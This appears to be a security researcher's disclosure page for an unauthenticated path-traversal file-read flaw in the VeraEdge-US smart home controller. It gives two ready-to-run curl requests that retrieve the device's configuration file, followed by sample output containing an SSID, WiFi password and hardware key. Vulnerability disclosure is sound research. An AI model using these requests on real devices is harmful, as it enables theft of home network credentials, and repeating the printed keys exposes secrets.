VeraEdge Smart Home
"Although the information we release has been verified and shown to work to the best our knowledge, we cant be held accountable for bricked devices or roots gone wrong."
VeraEdge-US Smart Home Controller
The VeraEdge-US is a smart home controller used for bridging smart home devices with a users WiFi network.
Purchase
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. Purchase the VeraEdge-US Smart Home Controller at Amazon
Local File Disclosure
VeraEdge-US Smart Home contains a Local File Disclosure via get_file.sh and store_file.sh, both which can be hit without authentication. Below you can find the code within get_file.sh.
Unfortunately get_file requires a directory to exist which store_file conveniently creates. A POC for retrieving the file containing the devices SSID and WiFi key (/etc/cmh/cmh.conf) can be seen below.
curl -X POST -v 'http://<DEVICEIP>/cgi-bin/cmh/store_file.sh' --data store_file=123 curl -X POST -v 'http://<DEVICEIP>/cgi-bin/cmh/get_file.sh' --data filename="../../../../../etc/cmh/cmh.conf" ArchiveLogsOnServer=1 ESSID=mios_45026848 Password=wind72sand HW_Key=3sMwesqBERodWW7l3mew43fsC1d3sf